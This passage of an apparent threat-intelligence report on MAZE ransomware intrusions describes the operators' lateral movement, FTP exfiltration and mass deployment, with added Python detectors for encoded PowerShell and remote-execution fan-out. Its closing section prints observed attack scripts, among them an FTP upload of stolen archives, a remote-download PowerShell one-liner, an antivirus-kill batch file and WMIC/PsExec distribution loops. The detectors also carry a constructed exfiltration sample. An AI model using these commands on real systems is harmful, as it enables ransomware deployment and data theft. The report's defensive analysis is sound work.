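        elif orig in RECON_TOOLS or img in RECON_TOOLS:
            name = RECON_TOOLS.get(orig) or RECON_TOOLS[img]
            findings.append(Finding(ev.host, "recon_tool", f"{name}: {ev.cmdline}"))
    return findings


def find_nslookup_bursts(events: List[ProcessEvent],
                         threshold: int = NSLOOKUP_BURST_THRESHOLD) -> List[Finding]:
    # Keyed by host only; real telemetry would also key on the parent process id.
    per_host: Counter = Counter()
    for ev in events:
        if basename(ev.image) == "nslookup.exe" and basename(ev.parent_image) == "cmd.exe":
            per_host[ev.host] += 1
    return [Finding(host, "nslookup_burst", f"{n} nslookup executions spawned by cmd.exe")
            for host, n in per_host.items() if n >= threshold]


def analyze(events: List[ProcessEvent]) -> List[Finding]:
    return find_tooling(events) + find_nslookup_bursts(events)


CMD = r"C:\Windows\System32\cmd.exe"
# Constructed sample telemetry: one workstation staging AD output, one legitimate 7-Zip use.
SAMPLE_EVENTS: List[ProcessEvent] = [
    ProcessEvent("WS-ADMIN01", r"C:\Users\svc_support\Downloads\7.exe", "7z.exe", CMD,
                 r"7.exe a ad.7z C:\Users\svc_support\Downloads\out\*"),
    ProcessEvent("WS-ADMIN01", r"C:\Users\svc_support\Downloads\adfind.exe", "AdFind.exe", CMD,
                 r"adfind.exe -f objectcategory=computer"),
    ProcessEvent("FS01", r"C:\Program Files\7-Zip\7z.exe", "7z.exe", r"C:\Windows\explorer.exe",
                 r"7z.exe a backup.7z D:\exports"),
] + [
    ProcessEvent("WS-ADMIN01", r"C:\Windows\System32\nslookup.exe", "nslookup.exe", CMD,
                 f"nslookup srv{i:02d}.corp.example")
    for i in range(12)
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.host:<11} {f.rule:<15} {f.detail}")
```

              The legitimate 7-Zip run on FS01 produces nothing because its on-disk name matches its OriginalFileName and 7-Zip is not itself a recon tool; only the rename and the AD tooling on WS-ADMIN01 surface, together with the nslookup burst.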

              Lateral Movement

              Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

              • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate RDP sessions to enable both lateral movement and privilege escalation.
              • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
              • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
              • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

              Complete Mission

              There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various ways (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

              • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
              • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
              • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
              • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
              • Prior to deploying MAZE ransomware threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.
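              The first two exfiltration bullets describe base64-encoded PowerShell used to push .7z archives to an FTP server with a hard-coded credential. Because -EncodedCommand is simply base64 over the UTF-16LE script, command-line telemetry can be decoded offline and searched for the markers of that behaviour. The following is an added example, not the script from the incident or the TechNet post the text refers to: it decodes the blob and scores the result for FTP-upload indicators. The log lines, the address (from the RFC 5737 test range), the credential placeholders and the script fragment are all constructed.

```python
"""Decode PowerShell -EncodedCommand blobs from process logs and flag FTP-upload
indicators (constructed example)."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# -e, -ec, -en, -enc, -encodedcommand (case-insensitive) followed by a base64 blob.
ENC_FLAG = re.compile(r"(?:-|/)(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

FTP_INDICATORS = [
    ("ftp_url", re.compile(r"ftp://", re.I)),
    ("ftp_api", re.compile(r"FtpWebRequest|WebRequestMethods\+Ftp", re.I)),
    ("upload_call", re.compile(r"\.UploadFile\(", re.I)),
    ("7z_archive", re.compile(r"\.7z\b", re.I)),
    ("hardcoded_credential", re.compile(r"NetworkCredential\(", re.I)),
]


@dataclass
class Verdict:
    cmdline: str
    encoded: bool
    decoded: Optional[str]
    indicators: List[str] = field(default_factory=list)
    verdict: str = "plain"


def encode_for_powershell(script: str) -> str:
    """The base64 form PowerShell expects (UTF-16LE); used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an -EncodedCommand blob."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def classify(cmdline: str) -> Verdict:
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return Verdict(cmdline, encoded=False, decoded=None)
    hits = [name for name, pat in FTP_INDICATORS if pat.search(decoded)]
    if len(hits) >= 2:
        verdict = "encoded_exfil_suspect"
    elif hits:
        verdict = "encoded_review"
    else:
        verdict = "encoded_benign"
    return Verdict(cmdline, True, decoded, hits, verdict)


def analyze_logs(cmdlines: List[str]) -> List[Verdict]:
    return [classify(c) for c in cmdlines]


# Constructed fragment mirroring the behaviour described in the text (every .7z in a
# staging folder pushed to an FTP server with an inline credential).
SAMPLE_SCRIPT = (
    "$wc = New-Object System.Net.WebClient; "
    "$wc.Credentials = New-Object System.Net.NetworkCredential('ftpuser', 'ftppass'); "
    "Get-ChildItem C:\\stage -Filter *.7z | ForEach-Object { "
    "$wc.UploadFile('ftp://192.0.2.10/' + $_.Name, $_.FullName) }"
)

# Constructed command lines: a plain script run, the encoded upload, and an encoded
# but harmless inventory command that must not fire.
SAMPLE_LOGS = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(SAMPLE_SCRIPT),
    "powershell.exe -enc " + encode_for_powershell(r"Get-Service | Out-File C:\temp\svc.txt"),
]

if __name__ == "__main__":
    for v in analyze_logs(SAMPLE_LOGS):
        print(v.verdict, v.indicators)
```

              Encoding alone is treated as a reason to decode, not to alert: the third sample line is encoded but benign and stays at "encoded_benign", while the upload fragment trips four of the five indicators.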

              In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency to their demands.

              • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
              • Attackers employed batch scripts and a series of .txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
              • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
              • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
                • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
                • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment.
                • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.
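              The start.bat / xaa3x.bat deployment described above leaves a distinctive trace in process telemetry: one source host issuing copy-to-admin-share, WMIC "process call create" and PsExec commands against many distinct targets within a short window. The following is an added example, not code from the Mandiant post, that catches that fan-out with a sliding window over distinct remote targets per source host, and separately flags shadow-copy deletion (the "WMIC SHADOWCOPY DELETE" behaviour named in the detection table later in the post). Every host name, timestamp and command line below is constructed; the sss.exe and windows.bat names are taken from the text only so the sample resembles the described scripts.

```python
"""Detect scripted mass deployment (fan-out) and shadow-copy deletion from
process-creation events (constructed example)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

REMOTE_EXEC_PATTERNS = [
    ("psexec", re.compile(r"\bpsexec(?:\.exe)?\s+\\\\([\w.-]+)", re.I)),
    ("wmic_process_create",
     re.compile(r"\bwmic(?:\.exe)?\s+/node:\"?([\w.-]+)\"?\s+.*?\bprocess\s+call\s+create\b", re.I)),
    ("copy_admin_share", re.compile(r"\bcopy\s+\S+\s+\\\\([\w.-]+)\\(?:c|admin)\$", re.I)),
]
SHADOW_DELETE = re.compile(
    r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I)


@dataclass(frozen=True)
class ProcessEvent:
    ts: int        # seconds since epoch (constructed)
    host: str      # host on which the process ran
    cmdline: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def extract_remote_target(cmdline: str) -> Optional[Tuple[str, str]]:
    """(technique, target host) if the command stages or executes something remotely."""
    for name, pat in REMOTE_EXEC_PATTERNS:
        m = pat.search(cmdline)
        if m:
            return name, m.group(1).lower()
    return None


def detect_fan_out(events: List[ProcessEvent], threshold: int = 5,
                   window_s: int = 120) -> List[Finding]:
    """Flag a source host that touches >= threshold distinct targets within window_s."""
    per_host: Dict[str, List[Tuple[int, str]]] = defaultdict(list)
    for ev in events:
        hit = extract_remote_target(ev.cmdline)
        if hit:
            per_host[ev.host].append((ev.ts, hit[1]))
    findings = []
    for host, items in per_host.items():
        items.sort()
        best, start = 0, 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window_s:
                start += 1
            best = max(best, len({t for _, t in items[start:end + 1]}))
        if best >= threshold:
            findings.append(Finding(host, "remote_exec_fan_out",
                                    f"{best} distinct targets within {window_s}s"))
    return findings


def detect_shadow_copy_deletion(events: List[ProcessEvent]) -> List[Finding]:
    return [Finding(ev.host, "shadow_copy_deletion", ev.cmdline)
            for ev in events if SHADOW_DELETE.search(ev.cmdline)]


def analyze(events: List[ProcessEvent]) -> List[Finding]:
    return detect_fan_out(events) + detect_shadow_copy_deletion(events)


T0 = 1_600_000_000
SAMPLE_EVENTS: List[ProcessEvent] = []
# Constructed: a batch-driven push to eight workstations in about 40 seconds.
for i in range(8):
    target = f"ws{i:02d}"
    SAMPLE_EVENTS += [
        ProcessEvent(T0 + 5 * i, "WS-ADMIN01",
                     rf"copy C:\stage\sss.exe \\{target}\c$\Windows\Temp\sss.exe"),
        ProcessEvent(T0 + 5 * i + 1, "WS-ADMIN01",
                     rf'wmic /node:{target} process call create "C:\Windows\Temp\windows.bat"'),
        ProcessEvent(T0 + 5 * i + 2, "WS-ADMIN01", rf"psexec \\{target} -d C:\Windows\Temp\sss.exe"),
    ]
# Constructed: routine admin PsExec use against two servers 15 minutes apart (no alert),
# and a shadow-copy deletion on a file server.
SAMPLE_EVENTS += [
    ProcessEvent(T0, "IT-OPS02", r"psexec \\srv-print01 ipconfig /all"),
    ProcessEvent(T0 + 900, "IT-OPS02", r"psexec \\srv-print02 ipconfig /all"),
    ProcessEvent(T0 + 100, "SRV-FILE01", "wmic shadowcopy delete"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.host:<11} {f.rule:<22} {f.detail}")
```

              The threshold and window are tunable; the point of keying on distinct targets rather than raw command count is that a single administrator re-running one command against one server never reaches it, while a host-list-driven script does within seconds.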

              Implications

              Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

              Mandiant Security Validation Actions

              Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

              • A100-877 - Active Directory - BloodHound, CollectionMethod All
              • A150-006 - Command and Control - BEACON, Check-in
              • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
              • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
              • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
              • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
              • A100-887 - Command and Control - MAZE, DNS Query #1
              • A100-888 - Command and Control - MAZE, DNS Query #2
              • A100-889 - Command and Control - MAZE, DNS Query #3
              • A100-890 -  Command and Control - MAZE, DNS Query #4
              • A100-891 - Command and Control - MAZE, DNS Query #5
              • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
              • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
              • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
              • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
              • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
              • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
              • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
              • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
              • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
              • A104-052 - Host CLI - Credential Access: Mimikatz
              • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
              • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
              • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
              • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
              • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
              • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
              • A104-493 - Host CLI - Discovery: Enumerate Network Shares
              • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
              • A104-482 - Host CLI - Discovery: Language Query Using reg query
              • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
              • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
              • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
              • A104-027 - Host CLI - Discovery: Process Discovery
              • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
              • A104-029 - Host CLI - Discovery: Remote System Discovery
              • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
              • A104-083 - Host CLI - Discovery: System Info
              • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
              • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
              • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
              • A100-879 - Malicious File Transfer - Adfind.exe, Download
              • A150-046 - Malicious File Transfer - BEACON, Download
              • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
              • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
              • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
              • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
              • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
              • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
              • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
              • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
              • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
              • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
              • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
              • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
              • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
              • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
              • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
              • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
              • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
              • A100-886 - Malicious File Transfer - Rclone.exe, Download
              • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

              Detecting the Techniques

              Platform                                     Signature Name
              MVX (covers multiple FireEye technologies)   Bale Detection
                                                           FE_Ransomware_Win_MAZE_1
              Endpoint Security                            WMIC SHADOWCOPY DELETE (METHODOLOGY)
                                                           MAZE RANSOMWARE (FAMILY)
              Network Security                             Ransomware.Win.MAZE
                                                           Ransomware.Maze
                                                           Ransomware.Maze

              MITRE ATT&CK Mappings

              Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

              MAZE Group 1 MITRE ATT&CK Mapping

              ATT&CK Tactic Category    Techniques
              Initial Access            T1133: External Remote Services; T1078: Valid Accounts
              Execution                 T1059: Command-Line Interface; T1086: PowerShell; T1064: Scripting; T1035: Service Execution
              Persistence               T1078: Valid Accounts; T1050: New Service
              Privilege Escalation      T1078: Valid Accounts
              Defense Evasion           T1078: Valid Accounts; T1036: Masquerading; T1027: Obfuscated Files or Information; T1064: Scripting
              Credential Access         T1110: Brute Force; T1003: Credential Dumping
              Discovery                 T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery; T1135: Network Share Discovery; T1069: Permission Groups Discovery; T1018: Remote System Discovery; T1016: System Network Configuration Discovery
              Lateral Movement          T1076: Remote Desktop Protocol; T1105: Remote File Copy
              Collection                T1005: Data from Local System
              Command and Control       T1043: Commonly Used Port; T1105: Remote File Copy; T1071: Standard Application Layer Protocol
              Exfiltration              T1002: Data Compressed; T1048: Exfiltration Over Alternative Protocol
              Impact                    T1486: Data Encrypted for Impact; T1489: Service Stop

MAZE Group 2 MITRE ATT&CK Mapping

ATT&CK Tactic Category / Techniques

Initial Access
    T1193: Spearphishing Attachment
Execution
    T1059: Command-Line Interface; T1086: PowerShell; T1085: Rundll32; T1064: Scripting; T1204: User Execution; T1028: Windows Remote Management
Persistence
    T1078: Valid Accounts; T1050: New Service; T1136: Create Account
Privilege Escalation
    T1078: Valid Accounts; T1050: New Service
Defense Evasion
    T1078: Valid Accounts; T1140: Deobfuscate/Decode Files or Information; T1107: File Deletion; T1036: Masquerading
Credential Access
    T1003: Credential Dumping; T1081: Credentials in Files; T1171: LLMNR/NBT-NS Poisoning
Discovery
    T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery; T1135: Network Share Discovery; T1069: Permission Groups Discovery; T1018: Remote System Discovery; T1033: System Owner/User Discovery
Lateral Movement
    T1076: Remote Desktop Protocol; T1028: Windows Remote Management
Collection
    T1074: Data Staged; T1005: Data from Local System; T1039: Data from Network Shared Drive
Command and Control
    T1043: Commonly Used Port; T1219: Remote Access Tools; T1105: Remote File Copy; T1071: Standard Application Layer Protocol; T1032: Standard Cryptographic Protocol
Exfiltration
    T1020: Automated Exfiltration; T1002: Data Compressed; T1048: Exfiltration Over Alternative Protocol
Impact
    T1486: Data Encrypted for Impact

MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

ATT&CK Tactic Category / Techniques

Initial Access
    T1133: External Remote Services; T1078: Valid Accounts
Execution
    T1059: Command-Line Interface; T1086: PowerShell; T1064: Scripting; T1035: Service Execution
Persistence
    T1078: Valid Accounts; T1031: Modify Existing Service
Privilege Escalation
    T1055: Process Injection; T1078: Valid Accounts
Defense Evasion
    T1055: Process Injection; T1078: Valid Accounts; T1116: Code Signing; T1089: Disabling Security Tools; T1202: Indirect Command Execution; T1112: Modify Registry; T1027: Obfuscated Files or Information; T1108: Redundant Access; T1064: Scripting
Credential Access
    T1003: Credential Dumping
Discovery
    T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery; T1069: Permission Groups Discovery; T1018: Remote System Discovery
Lateral Movement
    T1097: Pass the Ticket; T1076: Remote Desktop Protocol; T1105: Remote File Copy; T1077: Windows Admin Shares
Collection
    T1074: Data Staged; T1039: Data from Network Shared Drive
Command and Control
    T1043: Commonly Used Port; T1219: Remote Access Tools; T1105: Remote File Copy; T1071: Standard Application Layer Protocol; T1032: Standard Cryptographic Protocol
Exfiltration
    T1002: Data Compressed
Impact
    T1486: Data Encrypted for Impact; T1490: Inhibit System Recovery; T1489: Service Stop

              Example Commands Observed in MAZE Ransomware Incidents

              function Enum-UsersFolders($PathEnum)
              {
                  $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

                  Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
                  Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
                  Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

                  foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

                      foreach($SeachDir in $foldersArr) {
                          Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
                      }
                  }
              }

              PowerShell reconnaissance script used to enumerate directories

              $Dir="C:/Windows/Temp/"
              #ftp server
              $ftp = "ftp://<IP Address>/incoming/"
              $user = "<username>"
              $pass = "<password>"
              $webclient = New-Object System.Net.WebClient
              $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
              #list every sql server trace file
              foreach($item in (dir $Dir "*.7z")){
                 "Uploading $item..."
                 $uri = New-Object System.Uri($ftp+$item.Name)
                 $webclient.UploadFile($uri, $item.FullName)
              }

              Decoded FTP upload PowerShell script

              powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

              Decoded FTP upload PowerShell script

              […]
              echo 7
              echo 7
              taskkill /im csrss_tc.exe /f
              taskkill /im kwsprod.exe /f
              taskkill /im avkwctl.exe /f
              taskkill /im rnav.exe /f
              taskkill /im crssvc.exe /f
              sc config CSAuth start= disabled
              taskkill /im vsserv.exe /f
              taskkill /im ppmcativedetection.exe /f
              […]
              taskkill /im sahookmain.exe /f
              taskkill /im mcinfo.exe /f
              reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
              netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
              c:\windows\temp\sss.exe

              Excerpt from windows.bat kill script

              start copy sss.exe \\<internal IP>\c$\windows\temp\
              start copy sss.exe \\<internal IP>\c$\windows\temp\

              start copy windows.bat \\<internal IP>\c$\windows\temp\
              start copy windows.bat \\<internal IP>\c$\windows\temp\

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

              Example commands from MAZE distribution scripts

              @echo off
              del done.txt
              del offline.txt
              rem Loop thru list of computer names in file specified on command-line
              for /f %%i in (%1) do call :check_machine %%i
              goto end
              :check_machine
              rem Check to see if machine is up.
              ping -n 1 %1|Find "TTL=" >NUL 2>NUL
              if errorlevel 1 goto down
              echo %1
              START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
              timeout 1 > NUL
              echo %1 >> done.txt
              rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
              START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
              goto end
              :down
                rem Report machine down
                echo %1 >> offline.txt
              :end

              Example MAZE distribution script
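The distribution, kill and FTP upload scripts above share a handful of command-line patterns that a defender can match in process-creation telemetry. The detection script below is an added example written for this page, not FireEye/Mandiant code; it runs the rules over a constructed, simplified process log (hosts, IPs, account names and the "timestamp|host|user|command line" format are placeholders, not a real EDR schema) and treats the kill script as a per-host burst of taskkill/sc config commands rather than alerting on each one.

```python
import re
from collections import Counter

# Constructed process-creation events, not real telemetry. One event per line,
# "timestamp|host|user|command line"; hosts, IPs and accounts are placeholders
# modelled on the MAZE distribution, kill and FTP upload scripts shown above.
SAMPLE_EVENTS = [
    r'2020-05-07T01:02:03Z|WS01|CORP\jsmith|cmd.exe /c copy report.docx \\fileserver\share\report.docx',
    r'2020-05-07T01:02:10Z|WS01|CORP\jsmith|taskkill /im notepad.exe /f',
    r'2020-05-07T01:10:00Z|JUMP01|CORP\adminaccount|cmd.exe /c copy sss.exe \\10.0.0.5\c$\windows\temp\sss.exe',
    r'2020-05-07T01:10:01Z|JUMP01|CORP\adminaccount|wmic /node:"10.0.0.5" /user:"CORP\adminaccount" /password:"<password>" process call create "c:\windows\temp\sss.exe"',
    r'2020-05-07T01:10:02Z|JUMP01|CORP\adminaccount|psexec.exe \\10.0.0.6 -u CORP\adminaccount -p "<password>" -d -h -s -accepteula -nobanner c:\windows\temp\windows.bat',
    r'2020-05-07T01:10:05Z|JUMP01|CORP\adminaccount|wmic /node:"10.0.0.7" process call create "regsvr32.exe /i C:\windows\temp\payload.dll"',
    r'2020-05-07T02:00:00Z|SRV02|NT AUTHORITY\SYSTEM|taskkill /im csrss_tc.exe /f',
    r'2020-05-07T02:00:01Z|SRV02|NT AUTHORITY\SYSTEM|taskkill /im kwsprod.exe /f',
    r'2020-05-07T02:00:02Z|SRV02|NT AUTHORITY\SYSTEM|taskkill /im avkwctl.exe /f',
    r'2020-05-07T02:00:03Z|SRV02|NT AUTHORITY\SYSTEM|taskkill /im rnav.exe /f',
    r'2020-05-07T02:00:04Z|SRV02|NT AUTHORITY\SYSTEM|sc config CSAuth start= disabled',
    r'2020-05-07T02:00:05Z|SRV02|NT AUTHORITY\SYSTEM|taskkill /im vsserv.exe /f',
    r'2020-05-07T02:00:06Z|SRV02|NT AUTHORITY\SYSTEM|taskkill /im mcinfo.exe /f',
    r'2020-05-07T02:00:07Z|SRV02|NT AUTHORITY\SYSTEM|reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'2020-05-07T02:00:08Z|SRV02|NT AUTHORITY\SYSTEM|netsh advfirewall firewall set rule group="remote desktop" new enable=Yes',
    r"2020-05-07T02:00:09Z|SRV02|NT AUTHORITY\SYSTEM|powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath ftp://10.0.0.9/cobalt_uploads/ad.7z -localFile c:\windows\temp\ad.7z",
    r'2020-05-07T02:00:10Z|SRV02|NT AUTHORITY\SYSTEM|wmic shadowcopy delete',
]

# Single-event rules: (name, what it catches, with the page's ATT&CK technique
# where the mappings list one, case-insensitive regex over the command line).
RULES = [
    ("wmic_remote_exec", "distribution script: wmic /node remote process creation",
     r"\bwmic(?:\.exe)?\s+/node:.*\bprocess\s+call\s+create\b"),
    ("admin_share_temp_copy", "distribution script: payload staged via c$\\windows\\temp (T1077, T1105)",
     r"\bcopy\b.*\\\\[^\\\s]+\\c\$\\windows\\temp\\"),
    ("regsvr32_from_temp", "distribution script: regsvr32 /i launching a payload from windows\\temp",
     r"\bregsvr32(?:\.exe)?\s+/i\s+\S*\\windows\\temp\\"),
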